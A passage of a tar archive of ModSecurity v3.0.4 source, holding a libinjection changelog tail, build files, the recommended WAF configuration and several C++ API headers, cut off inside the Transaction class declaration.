_future_ sqli attacks. All of these new fingerprints have no been seen 'in the wild' yet. ## other * Replaced BSD memmem with optimzed version. This eliminates all 3rd party code. * Added alpha python module (python setup.py install) * Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding. * Added version number in sqlparse.h, based on http://www.python.org/dev/peps/pep-0386/#normalizedversion # v1.0.0 2013-04-24 * retroactive initial release * all memory issues fixed modsecurity-v3.0.4/others/libinjection/CHANGELOG0000644000175000017500000000002213607066311021671 0ustar zimmerlezimmerlesee CHANGELOG.md modsecurity-v3.0.4/others/libinjection/.travis.yml0000644000175000017500000000044313607066311022577 0ustar zimmerlezimmerlesudo: required dist: trusty language: generic services: - docker before_install: - docker pull nickg/libinjection-docker script: - docker run -e COVERALLS_REPO_TOKEN=$COVERALLS_REPO_TOKEN -v $HOME/build/client9/libinjection:/build -w /build nickg/libinjection-docker ./make-ci.sh modsecurity-v3.0.4/others/libinjection/.gitignore0000644000175000017500000000057513607066311022464 0ustar zimmerlezimmerle*~ *.pyc *.dSYM c/#* *.plist *.info *.gch *.gcov # gnu autotest *.trs #aclocal.m4 app.info autom4te.cache #compile config.h #config.h.in #config.guess config.log config.status #config.sub #configure configure.scan coverage_report #depcomp #install-sh #libtool #ltmain.sh #Makefile.in #m4 #missing stamp-h1 *~ *.html *.log *.o *.la *.so* *.a .deps *.tar* *.zip *.lo *.gcno *.gcda modsecurity-v3.0.4/others/Makefile.am0000644000175000017500000000136213607066010020046 0ustar zimmerlezimmerle noinst_LTLIBRARIES = libinjection.la libmbedtls.la libinjection_la_SOURCES = \ libinjection/src/libinjection_html5.c \ libinjection/src/libinjection_sqli.c \ libinjection/src/libinjection_xss.c noinst_HEADERS = \ libinjection/src/libinjection.h \ libinjection/src/libinjection_html5.h \ libinjection/src/libinjection_sqli.h \ libinjection/src/libinjection_sqli_data.h \ libinjection/src/libinjection_xss.h \ mbedtls/base64.h \ mbedtls/check_config.h \ mbedtls/mbed-tls-config.h \ mbedtls/md5.h \ mbedtls/platform.h \ mbedtls/sha1.h libmbedtls_la_SOURCES = \ mbedtls/base64.c \ mbedtls/md5.c \ mbedtls/sha1.c libmbedtls_la_CFLAGS = -D MBEDTLS_CONFIG_FILE=\"mbed-tls-config.h\" -Iothers libmbedtls_la_CPPFLAGS = libmbedtls_la_LIBADD = modsecurity-v3.0.4/modsecurity.pc.in0000644000175000017500000000033713607066010020007 0ustar zimmerlezimmerleprefix=@prefix@ exec_prefix=@exec_prefix@ libdir=@libdir@ includedir=@includedir@ Name: ModSecurity Description: ModSecurity API Version: @MSC_VERSION_WITH_PATCHLEVEL@ Cflags: -I@includedir@ Libs: -L@libdir@ -lmodsecurity modsecurity-v3.0.4/modsecurity.conf-recommended0000644000175000017500000002374213607066010022212 0ustar zimmerlezimmerle# -- Rule engine initialization ---------------------------------------------- # Enable ModSecurity, attaching it to every transaction. Use detection # only to start with, because that minimises the chances of post-installation # disruption. # SecRuleEngine DetectionOnly # -- Request body handling --------------------------------------------------- # Allow ModSecurity to access request bodies. If you don't, ModSecurity # won't be able to see any POST parameters, which opens a large security # hole for attackers to exploit. # SecRequestBodyAccess On # Enable XML request body parser. # Initiate XML Processor in case of xml content-type # SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" # Enable JSON request body parser. # Initiate JSON Processor in case of JSON content-type; change accordingly # if your application does not use 'application/json' # SecRule REQUEST_HEADERS:Content-Type "application/json" \ "id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON" # Maximum request body size we will accept for buffering. If you support # file uploads then the value given on the first line has to be as large # as the largest file you are willing to accept. The second value refers # to the size of data, with files excluded. You want to keep that value as # low as practical. # SecRequestBodyLimit 13107200 SecRequestBodyNoFilesLimit 131072 # What do do if the request body size is above our configured limit. # Keep in mind that this setting will automatically be set to ProcessPartial # when SecRuleEngine is set to DetectionOnly mode in order to minimize # disruptions when initially deploying ModSecurity. # SecRequestBodyLimitAction Reject # Verify that we've correctly processed the request body. # As a rule of thumb, when failing to process a request body # you should reject the request (when deployed in blocking mode) # or log a high-severity alert (when deployed in detection-only mode). # SecRule REQBODY_ERROR "!@eq 0" \ "id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2" # By default be strict with what we accept in the multipart/form-data # request body. If the rule below proves to be too strict for your # environment consider changing it to detection-only. You are encouraged # _not_ to remove it altogether. # SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ "id:'200003',phase:2,t:none,log,deny,status:400, \ msg:'Multipart request body failed strict validation: \ PE %{REQBODY_PROCESSOR_ERROR}, \ BQ %{MULTIPART_BOUNDARY_QUOTED}, \ BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ DB %{MULTIPART_DATA_BEFORE}, \ DA %{MULTIPART_DATA_AFTER}, \ HF %{MULTIPART_HEADER_FOLDING}, \ LF %{MULTIPART_LF_LINE}, \ SM %{MULTIPART_MISSING_SEMICOLON}, \ IQ %{MULTIPART_INVALID_QUOTING}, \ IP %{MULTIPART_INVALID_PART}, \ IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ FL %{MULTIPART_FILE_LIMIT_EXCEEDED}'" # Did we see anything that might be a boundary? # # Here is a short description about the ModSecurity Multipart parser: the # parser returns with value 0, if all "boundary-like" line matches with # the boundary string which given in MIME header. In any other cases it returns # with different value, eg. 1 or 2. # # The RFC 1341 descript the multipart content-type and its syntax must contains # only three mandatory lines (above the content): # * Content-Type: multipart/mixed; boundary=BOUNDARY_STRING # * --BOUNDARY_STRING # * --BOUNDARY_STRING-- # # First line indicates, that this is a multipart content, second shows that # here starts a part of the multipart content, third shows the end of content. # # If there are any other lines, which starts with "--", then it should be # another boundary id - or not. # # After 3.0.3, there are two kinds of types of boundary errors: strict and permissive. # # If multipart content contains the three necessary lines with correct order, but # there are one or more lines with "--", then parser returns with value 2 (non-zero). # # If some of the necessary lines (usually the start or end) misses, or the order # is wrong, then parser returns with value 1 (also a non-zero). # # You can choose, which one is what you need. The example below contains the # 'strict' mode, which means if there are any lines with start of "--", then # ModSecurity blocked the content. But the next, commented example contains # the 'permissive' mode, then you check only if the necessary lines exists in # correct order. Whit this, you can enable to upload PEM files (eg "----BEGIN.."), # or other text files, which contains eg. HTTP headers. # # The difference is only the operator - in strict mode (first) the content blocked # in case of any non-zero value. In permissive mode (second, commented) the # content blocked only if the value is explicit 1. If it 0 or 2, the content will # allowed. # # # See #1747 and #1924 for further information on the possible values for # MULTIPART_UNMATCHED_BOUNDARY. # SecRule MULTIPART_UNMATCHED_BOUNDARY "@eq 1" \ "id:'200004',phase:2,t:none,log,deny,msg:'Multipart parser detected a possible unmatched boundary.'" # PCRE Tuning # We want to avoid a potential RegEx DoS condition # SecPcreMatchLimit 1000 SecPcreMatchLimitRecursion 1000 # Some internal errors will set flags in TX and we will need to look for these. # All of these are prefixed with "MSC_". The following flags currently exist: # # MSC_PCRE_LIMITS_EXCEEDED: PCRE match limits were exceeded. # SecRule TX:/^MSC_/ "!@streq 0" \ "id:'200005',phase:2,t:none,deny,msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'" # -- Response body handling -------------------------------------------------- # Allow ModSecurity to access response bodies. # You should have this directive enabled in order to identify errors # and data leakage issues. # # Do keep in mind that enabling this directive does increases both # memory consumption and response latency. # SecResponseBodyAccess On # Which response MIME types do you want to inspect? You should adjust the # configuration below to catch documents but avoid static files # (e.g., images and archives). # SecResponseBodyMimeType text/plain text/html text/xml # Buffer response bodies of up to 512 KB in length. SecResponseBodyLimit 524288 # What happens when we encounter a response body larger than the configured # limit? By default, we process what we have and let the rest through. # That's somewhat less secure, but does not break any legitimate pages. # SecResponseBodyLimitAction ProcessPartial # -- Filesystem configuration ------------------------------------------------ # The location where ModSecurity stores temporary files (for example, when # it needs to handle a file upload that is larger than the configured limit). # # This default setting is chosen due to all systems have /tmp available however, # this is less than ideal. It is recommended that you specify a location that's private. # SecTmpDir /tmp/ # The location where ModSecurity will keep its persistent data. This default setting # is chosen due to all systems have /tmp available however, it # too should be updated to a place that other users can't access. # SecDataDir /tmp/ # -- File uploads handling configuration ------------------------------------- # The location where ModSecurity stores intercepted uploaded files. This # location must be private to ModSecurity. You don't want other users on # the server to access the files, do you? # #SecUploadDir /opt/modsecurity/var/upload/ # By default, only keep the files that were determined to be unusual # in some way (by an external inspection script). For this to work you # will also need at least one file inspection rule. # #SecUploadKeepFiles RelevantOnly # Uploaded files are by default created with permissions that do not allow # any other user to access them. You may need to relax that if you want to # interface ModSecurity to an external program (e.g., an anti-virus). # #SecUploadFileMode 0600 # -- Debug log configuration ------------------------------------------------- # The default debug log configuration is to duplicate the error, warning # and notice messages from the error log. # #SecDebugLog /opt/modsecurity/var/log/debug.log #SecDebugLogLevel 3 # -- Audit log configuration ------------------------------------------------- # Log the transactions that are marked by a rule, as well as those that # trigger a server error (determined by a 5xx or 4xx, excluding 404, # level response status codes). # SecAuditEngine RelevantOnly SecAuditLogRelevantStatus "^(?:5|4(?!04))" # Log everything we know about a transaction. SecAuditLogParts ABIJDEFHZ # Use a single file for logging. This is much easier to look at, but # assumes that you will use the audit log only ocassionally. # SecAuditLogType Serial SecAuditLog /var/log/modsec_audit.log # Specify the path for concurrent audit logging. #SecAuditLogStorageDir /opt/modsecurity/var/audit/ # -- Miscellaneous ----------------------------------------------------------- # Use the most commonly used application/x-www-form-urlencoded parameter # separator. There's probably only one application somewhere that uses # something else so don't expect to change this value. # SecArgumentSeparator & # Settle on version 0 (zero) cookies, as that is what most applications # use. Using an incorrect cookie version may open your installation to # evasion attacks (against the rules that examine named cookies). # SecCookieFormat 0 # Specify your Unicode Code Point. # This mapping is used by the t:urlDecodeUni transformation function # to properly map encoded data to your language. Properly setting # these directives helps to reduce false positives and negatives. # SecUnicodeMapFile unicode.mapping 20127 # Improve the quality of ModSecurity by sharing information about your # current ModSecurity version and dependencies versions. # The following information will be shared: ModSecurity version, # Web Server version, APR version, PCRE version, Lua version, Libxml2 # version, Anonymous unique id for host. SecStatusEngine On modsecurity-v3.0.4/headers/0000755000175000017500000000000013607066010016117 5ustar zimmerlezimmerlemodsecurity-v3.0.4/headers/modsecurity/0000755000175000017500000000000013607066106020474 5ustar zimmerlezimmerlemodsecurity-v3.0.4/headers/modsecurity/modsecurity.h0000644000175000017500000002035013607066106023214 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ /** @file modsecurity.h Main ModSecurity header file */ /** @mainpage ModSecurity - open source, cross platform web application firewall * * Example Usage: * @code * * using ModSecurity::ModSecurity; * using ModSecurity::Rules; * using ModSecurity::Transaction; * * ModSecurity *modsec; * ModSecurity::Rules *rules; * * modsec = new ModSecurity(); * rules = new Rules(); * rules->loadFromUri(rules_file); * * Transaction *modsecTransaction = new Transaction(modsec, rules); * modsecTransaction->processConnection("127.0.0.1"); * * if (modsecTransaction->intervention()) { * std::cout << "There is an intervention" << std::endl; * } * * ... * * @endcode * */ /** * @defgroup ModSecurity_C_API ModSecurity C API * * This is the ModSecurity C API description * * At this page you can get information on how the extend your C * application, by embedding ModSecurity. * */ /** * @defgroup ModSecurity_CPP_API ModSecurity CPP API * * This is the ModSecurity CPP API description. * * At this page you can get information on how the extend your CPP * application, by embedding ModSecurity. * */ /** * @defgroup ModSecurity_Operator ModSecurity Operators * * SecLanguage operator */ #ifdef __cplusplus #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_MODSECURITY_H_ #define HEADERS_MODSECURITY_MODSECURITY_H_ #ifndef __cplusplus typedef struct ModSecurity_t modsecurity; #else namespace modsecurity { /** * * The Phases enumerator consists in mapping the different stages of a * given request. ModSecurity is expected to inspect data based on those * "phases". If your module/application use this in a different order, it * will lead ModSecurity to act in an unexpected behavior. * * It is mandatory to call all the phases, even if you don't have this * phases segmented in your end. * */ enum Phases { /** * * The connection is the very first information that ModSecurity can * inspect. It is expected to happens before the virtual host name be * resolved. This phase is expected to happen immediately after a * connection is established. * */ ConnectionPhase, /** * * The "URI" phase happens just after the web server (or any other * application that you may use with ModSecurity) have the acknowledgement * of the full request URI. * */ UriPhase, /** * * The "RequestHeaders" phase happens when the server has all the * information about the headers. Notice however, that it is expected to * happen prior to the reception of the request body (if any). * */ RequestHeadersPhase, /** * * At the "RequestHeaders" phase, ModSecurity is expected to inspect the * content of a request body, that does not happens when the server has all * the content but prior to that, when the body transmission started. * ModSecurity can ask the webserver to block (or make any other disruptive * action) while the client is still transmitting the data. * */ RequestBodyPhase, /** * * The "ResponseHeaders" happens just before all the response headers are * ready to be delivery to the client. * */ ResponseHeadersPhase, /** * * Same as "RequestBody" the "ResponseBody" phase perform a stream * inspection which may result in a disruptive action. * */ ResponseBodyPhase, /** * * The last phase is the logging phase. At this phase ModSecurity will * generate the internal logs, there is no need to hold the request at * this point as this phase does not produce any kind of action. * */ LoggingPhase, /** * Just a marking for the expected number of phases. * */ NUMBER_OF_PHASES, }; } // namespace modsecurity #endif #include "modsecurity/intervention.h" #include "modsecurity/transaction.h" #include "modsecurity/debug_log.h" /** * TAG_NUM: * * Alpha - 001 * Beta - 002 * Dev - 010 * Rc1 - 051 * Rc2 - 052 * ... - ... * Release- 100 * */ #define MODSECURITY_MAJOR "3" #define MODSECURITY_MINOR "0" #define MODSECURITY_PATCHLEVEL "4" #define MODSECURITY_TAG "" #define MODSECURITY_TAG_NUM "100" #define MODSECURITY_VERSION MODSECURITY_MAJOR "." \ MODSECURITY_MINOR "." MODSECURITY_PATCHLEVEL \ MODSECURITY_TAG #define MODSECURITY_VERSION_NUM MODSECURITY_MAJOR \ MODSECURITY_MINOR MODSECURITY_PATCHLEVEL MODSECURITY_TAG_NUM /* * @name ModSecLogCb * @brief Callback to be function on every log generation * * * The callback is going to be called on every log request. * * * void * Internal reference to be used by the API consumer. Whatever * is set here will be passed on every call. * void * Pointer to a const char * or RuleMessage class. The returned * data is selected on the log register property. * * @note Vide LogProperty enum to learn more about Log Properties. * */ typedef void (*ModSecLogCb) (void *, const void *); #ifdef __cplusplus namespace modsecurity { /* few forwarded declarations */ namespace actions { class Action; } class Rule; #ifdef __cplusplus extern "C" { #endif /** * * Properties used to configure the general log callback. * */ enum LogProperty { /** * * Original ModSecurity text log entry. The same entry that can be found * within the Apache error_log (in the 2.x family) * */ TextLogProperty = 1, /** * * Instead of return the text log entry an instance of the class * RuleMessages is returned. * */ RuleMessageLogProperty = 2, /** * This property only makes sense with the utilization of the * RuleMessageLogProperty. Without this property set the RuleMessage * structure will not be filled with the information of the hightlight. * * Notice that the highlight can be calculate post-analisys. Calculate it * during the analisys may delay the analisys process. * */ IncludeFullHighlightLogProperty = 4, }; #ifdef __cplusplus } #endif /** @ingroup ModSecurity_CPP_API */ class ModSecurity { public: ModSecurity(); ~ModSecurity(); const std::string& whoAmI(); void setConnectorInformation(std::string connector); void setServerLogCb(ModSecLogCb cb); /** * * properties Properties to inform ModSecurity what kind of infornation * is expected be returned. * */ void setServerLogCb(ModSecLogCb cb, int properties); void serverLog(void *data, std::shared_ptr rm); const std::string& getConnectorInformation(); int processContentOffset(const char *content, size_t len, const char *matchString, std::string *json, const char **err); collection::Collection *m_global_collection; collection::Collection *m_resource_collection; collection::Collection *m_ip_collection; collection::Collection *m_session_collection; collection::Collection *m_user_collection; private: std::string m_connector; std::string m_whoami; ModSecLogCb m_logCb; int m_logProperties; }; #endif #ifdef __cplusplus extern "C" { #endif /** @ingroup ModSecurity_C_API */ ModSecurity *msc_init(void); /** @ingroup ModSecurity_C_API */ const char *msc_who_am_i(ModSecurity *msc); /** @ingroup ModSecurity_C_API */ void msc_set_connector_info(ModSecurity *msc, const char *connector); /** @ingroup ModSecurity_C_API */ void msc_set_log_cb(ModSecurity *msc, ModSecLogCb cb); /** @ingroup ModSecurity_C_API */ void msc_cleanup(ModSecurity *msc); #ifdef __cplusplus } } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_MODSECURITY_H_ modsecurity-v3.0.4/headers/modsecurity/variable_value.h0000644000175000017500000000533313607066010023624 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #endif #include "modsecurity/variable_origin.h" #ifndef HEADERS_MODSECURITY_VARIABLE_VALUE_H_ #define HEADERS_MODSECURITY_VARIABLE_VALUE_H_ #ifndef __cplusplus typedef struct Variable_t VariableValue; #endif #ifdef __cplusplus namespace modsecurity { class Collection; class VariableValue { public: using Origins = std::list>; VariableValue(const std::string *key, const std::string *value = nullptr) : m_key(*key), m_keyWithCollection(*key), m_collection(""), m_value(value != nullptr?*value:"") { } VariableValue(const std::string *collection, const std::string *key, const std::string *value) : m_key(*key), m_keyWithCollection(*collection + ":" + *key), m_collection(*collection), m_value(*value) { } explicit VariableValue(const VariableValue *o) : m_key(o->m_key), m_value(o->m_value), m_collection(o->m_collection), m_keyWithCollection(o->m_keyWithCollection) { for (auto &i : o->m_orign) { std::unique_ptr origin(new VariableOrigin()); origin->m_offset = i->m_offset; origin->m_length = i->m_length; m_orign.push_back(std::move(origin)); } } const std::string& getKey() const { return m_key; } const std::string& getKeyWithCollection() const { return m_keyWithCollection; } const std::string& getCollection() const { return m_collection; } const std::string& getValue() const { return m_value; } void setValue(const std::string &value) { m_value = value; } void addOrigin(std::unique_ptr origin) { m_orign.push_back(std::move(origin)); } const Origins& getOrigin() const { return m_orign; } private: Origins m_orign; std::string m_collection; std::string m_key; std::string m_keyWithCollection; std::string m_value; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_VARIABLE_VALUE_H_ modsecurity-v3.0.4/headers/modsecurity/variable_origin.h0000644000175000017500000000230413607066010023772 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #endif #ifndef HEADERS_MODSECURITY_VARIABLE_ORIGIN_H_ #define HEADERS_MODSECURITY_VARIABLE_ORIGIN_H_ #ifndef __cplusplus typedef struct DebugLog_t DebugLog; #endif #ifdef __cplusplus namespace modsecurity { /** @ingroup ModSecurity_CPP_API */ class VariableOrigin { public: VariableOrigin() : m_length(0), m_offset(0) { } std::string toText() { std::string offset = std::to_string(m_offset); std::string len = std::to_string(m_length); return "v" + offset + "," + len; } int m_length; size_t m_offset; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_VARIABLE_ORIGIN_H_ modsecurity-v3.0.4/headers/modsecurity/transaction.h0000644000175000017500000005340413607066010023172 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #include #include #include #include #include #endif #include #include #ifndef HEADERS_MODSECURITY_TRANSACTION_H_ #define HEADERS_MODSECURITY_TRANSACTION_H_ #ifndef __cplusplus typedef struct ModSecurity_t ModSecurity; typedef struct Transaction_t Transaction; typedef struct Rules_t Rules; #endif #include "modsecurity/anchored_set_variable.h" #include "modsecurity/anchored_variable.h" #include "modsecurity/intervention.h" #include "modsecurity/collection/collections.h" #include "modsecurity/variable_value.h" #include "modsecurity/collection/collection.h" #include "modsecurity/variable_origin.h" #ifndef NO_LOGS #define ms_dbg(b, c) \ do { \ if (m_rules && m_rules->m_debugLog && m_rules->m_debugLog->m_debugLevel >= b) { \ m_rules->debug(b, m_id, m_uri, c); \ } \ } while (0); #else #define ms_dbg(b, c) \ do { } while (0); #endif #ifndef NO_LOGS #define ms_dbg_a(t, b, c) \ do { \ if (t && t->m_rules && t->m_rules->m_debugLog && t->m_rules->m_debugLog->m_debugLevel >= b) { \ t->debug(b, c); \ } \ } while (0); #else #define ms_dbg_a(t, b, c) \ do { } while (0); #endif #define LOGFY_ADD(a, b) \ yajl_gen_string(g, reinterpret_cast(a), strlen(a)); \ if (b == NULL) { \ yajl_gen_string(g, reinterpret_cast(""), \ strlen("")); \ } else { \ yajl_gen_string(g, reinterpret_cast(b), \ strlen(b)); \ } #define LOGFY_ADD_INT(a, b) \ yajl_gen_string(g, reinterpret_cast(a), strlen(a)); \ yajl_gen_number(g, reinterpret_cast(b), strlen(b)); #define LOGFY_ADD_NUM(a, b) \ yajl_gen_string(g, reinterpret_cast(a), strlen(a)); \ yajl_gen_integer(g, b); #ifdef __cplusplus namespace modsecurity { class ModSecurity; class Transaction; class Rules; class RuleMessage; namespace actions { class Action; namespace disruptive { enum AllowType : int; } } namespace RequestBodyProcessor { class XML; class JSON; } namespace operators { class Operator; } class TransactionAnchoredVariables { public: explicit TransactionAnchoredVariables(Transaction *t) : m_variableArgsNames(t, "ARGS_NAMES"), m_variableArgsGetNames(t, "ARGS_GET_NAMES"), m_variableArgsPostNames(t, "ARGS_POST_NAMES"), m_variableRequestHeadersNames(t, "REQUEST_HEADERS_NAMES"), m_variableResponseContentType(t, "RESPONSE_CONTENT_TYPE"), m_variableResponseHeadersNames(t, "RESPONSE_HEADERS_NAMES"), m_variableARGScombinedSize(t, "ARGS_COMBINED_SIZE"), m_variableAuthType(t, "AUTH_TYPE"), m_variableFilesCombinedSize(t, "FILES_COMBINED_SIZE"), m_variableFullRequest(t, "FULL_REQUEST"), m_variableFullRequestLength(t, "FULL_REQUEST_LENGTH"), m_variableInboundDataError(t, "INBOUND_DATA_ERROR"), m_variableMatchedVar(t, "MATCHED_VAR"), m_variableMatchedVarName(t, "MATCHED_VAR_NAME"), m_variableMultipartBoundaryQuoted(t, "MULTIPART_BOUNDARY_QUOTED"), m_variableMultipartBoundaryWhiteSpace(t, "MULTIPART_BOUNDARY_WHITESPACE"), m_variableMultipartCrlfLFLines(t, "MULTIPART_CRLF_LF_LINES"), m_variableMultipartDataAfter(t, "MULTIPART_DATA_AFTER"), m_variableMultipartDataBefore(t, "MULTIPART_DATA_BEFORE"), m_variableMultipartFileLimitExceeded(t, "MULTIPART_FILE_LIMIT_EXCEEDED"), m_variableMultipartHeaderFolding(t, "MULTIPART_HEADER_FOLDING"), m_variableMultipartInvalidHeaderFolding(t, "MULTIPART_INVALID_HEADER_FOLDING"), m_variableMultipartInvalidPart(t, "MULTIPART_INVALID_PART"), m_variableMultipartInvalidQuoting(t, "MULTIPART_INVALID_QUOTING"), m_variableMultipartLFLine(t, "MULTIPART_LF_LINE"), m_variableMultipartMissingSemicolon(t, "MULTIPART_MISSING_SEMICOLON"), m_variableMultipartStrictError(t, "MULTIPART_STRICT_ERROR"), m_variableMultipartUnmatchedBoundary(t, "MULTIPART_UNMATCHED_BOUNDARY"), m_variableOutboundDataError(t, "OUTBOUND_DATA_ERROR"), m_variablePathInfo(t, "PATH_INFO"), m_variableQueryString(t, "QUERY_STRING"), m_variableRemoteAddr(t, "REMOTE_ADDR"), m_variableRemoteHost(t, "REMOTE_HOST"), m_variableRemotePort(t, "REMOTE_PORT"), m_variableReqbodyError(t, "REQBODY_ERROR"), m_variableReqbodyErrorMsg(t, "REQBODY_ERROR_MSG"), m_variableReqbodyProcessorError(t, "REQBODY_PROCESSOR_ERROR"), m_variableReqbodyProcessorErrorMsg(t, "REQBODY_PROCESSOR_ERROR_MSG"), m_variableReqbodyProcessor(t, "REQBODY_PROCESSOR"), m_variableRequestBasename(t, "REQUEST_BASENAME"), m_variableRequestBody(t, "REQUEST_BODY"), m_variableRequestBodyLength(t, "REQUEST_BODY_LENGTH"), m_variableRequestFilename(t, "REQUEST_FILENAME"), m_variableRequestLine(t, "REQUEST_LINE"), m_variableRequestMethod(t, "REQUEST_METHOD"), m_variableRequestProtocol(t, "REQUEST_PROTOCOL"), m_variableRequestURI(t, "REQUEST_URI"), m_variableRequestURIRaw(t, "REQUEST_URI_RAW"), m_variableResource(t, "RESOURCE"), m_variableResponseBody(t, "RESPONSE_BODY"), m_variableResponseContentLength(t, "RESPONSE_CONTENT_LENGTH"), m_variableResponseProtocol(t, "RESPONSE_PROTOCOL"), m_variableResponseStatus(t, "RESPONSE_STATUS"), m_variableServerAddr(t, "SERVER_ADDR"), m_variableServerName(t, "SERVER_NAME"), m_variableServerPort(t, "SERVER_PORT"), m_variableSessionID(t, "SESSIONID"), m_variableUniqueID(t, "UNIQUE_ID"), m_variableUrlEncodedError(t, "URLENCODED_ERROR"), m_variableUserID(t, "USERID"), m_variableArgs(t, "ARGS"), m_variableArgsGet(t, "ARGS_GET"), m_variableArgsPost(t, "ARGS_POST"), m_variableFilesSizes(t, "FILES_SIZES"), m_variableFilesNames(t, "FILES_NAMES"), m_variableFilesTmpContent(t, "FILES_TMP_CONTENT"), m_variableMultipartFileName(t, "MULTIPART_FILENAME"), m_variableMultipartName(t, "MULTIPART_NAME"), m_variableMatchedVarsNames(t, "MATCHED_VARS_NAMES"), m_variableMatchedVars(t, "MATCHED_VARS"), m_variableFiles(t, "FILES"), m_variableRequestCookies(t, "REQUEST_COOKIES"), m_variableRequestHeaders(t, "REQUEST_HEADERS"), m_variableResponseHeaders(t, "RESPONSE_HEADERS"), m_variableGeo(t, "GEO"), m_variableRequestCookiesNames(t, "REQUEST_COOKIES_NAMES"), m_variableFilesTmpNames(t, "FILES_TMPNAMES"), m_variableOffset(0) { } AnchoredSetVariable m_variableArgsNames; AnchoredSetVariable m_variableArgsGetNames; AnchoredSetVariable m_variableArgsPostNames; AnchoredSetVariable m_variableRequestHeadersNames; AnchoredVariable m_variableResponseContentType; AnchoredSetVariable m_variableResponseHeadersNames; AnchoredVariable m_variableARGScombinedSize; AnchoredVariable m_variableAuthType; AnchoredVariable m_variableFilesCombinedSize; AnchoredVariable m_variableFullRequest; AnchoredVariable m_variableFullRequestLength; AnchoredVariable m_variableInboundDataError; AnchoredVariable m_variableMatchedVar; AnchoredVariable m_variableMatchedVarName; AnchoredVariable m_variableMultipartBoundaryQuoted; AnchoredVariable m_variableMultipartBoundaryWhiteSpace; AnchoredVariable m_variableMultipartCrlfLFLines; AnchoredVariable m_variableMultipartDataAfter; AnchoredVariable m_variableMultipartDataBefore; AnchoredVariable m_variableMultipartFileLimitExceeded; AnchoredVariable m_variableMultipartHeaderFolding; AnchoredVariable m_variableMultipartInvalidHeaderFolding; AnchoredVariable m_variableMultipartInvalidPart; AnchoredVariable m_variableMultipartInvalidQuoting; AnchoredVariable m_variableMultipartLFLine; AnchoredVariable m_variableMultipartMissingSemicolon; AnchoredVariable m_variableMultipartStrictError; AnchoredVariable m_variableMultipartUnmatchedBoundary; AnchoredVariable m_variableOutboundDataError; AnchoredVariable m_variablePathInfo; AnchoredVariable m_variableQueryString; AnchoredVariable m_variableRemoteAddr; AnchoredVariable m_variableRemoteHost; AnchoredVariable m_variableRemotePort; AnchoredVariable m_variableReqbodyError; AnchoredVariable m_variableReqbodyErrorMsg; AnchoredVariable m_variableReqbodyProcessorError; AnchoredVariable m_variableReqbodyProcessorErrorMsg; AnchoredVariable m_variableReqbodyProcessor; AnchoredVariable m_variableRequestBasename; AnchoredVariable m_variableRequestBody; AnchoredVariable m_variableRequestBodyLength; AnchoredVariable m_variableRequestFilename; AnchoredVariable m_variableRequestLine; AnchoredVariable m_variableRequestMethod; AnchoredVariable m_variableRequestProtocol; AnchoredVariable m_variableRequestURI; AnchoredVariable m_variableRequestURIRaw; AnchoredVariable m_variableResource; AnchoredVariable m_variableResponseBody; AnchoredVariable m_variableResponseContentLength; AnchoredVariable m_variableResponseProtocol; AnchoredVariable m_variableResponseStatus; AnchoredVariable m_variableServerAddr; AnchoredVariable m_variableServerName; AnchoredVariable m_variableServerPort; AnchoredVariable m_variableSessionID; AnchoredVariable m_variableUniqueID; AnchoredVariable m_variableUrlEncodedError; AnchoredVariable m_variableUserID; AnchoredSetVariable m_variableArgs; AnchoredSetVariable m_variableArgsGet; AnchoredSetVariable m_variableArgsPost; AnchoredSetVariable m_variableFilesSizes; AnchoredSetVariable m_variableFilesNames; AnchoredSetVariable m_variableFilesTmpContent; AnchoredSetVariable m_variableMultipartFileName; AnchoredSetVariable m_variableMultipartName; AnchoredSetVariable m_variableMatchedVarsNames; AnchoredSetVariable m_variableMatchedVars; AnchoredSetVariable m_variableFiles; AnchoredSetVariable m_variableRequestCookies; AnchoredSetVariable m_variableRequestHeaders; AnchoredSetVariable m_variableResponseHeaders; AnchoredSetVariable m_variableGeo; AnchoredSetVariable m_variableRequestCookiesNames; AnchoredSetVariable m_variableFilesTmpNames; int m_variableOffset; }; /** @ingroup ModSecurity_CPP_API */ class Transaction : public TransactionAnchoredVariables { public: Transaction(ModSecurity *transaction, Rules *rules, void 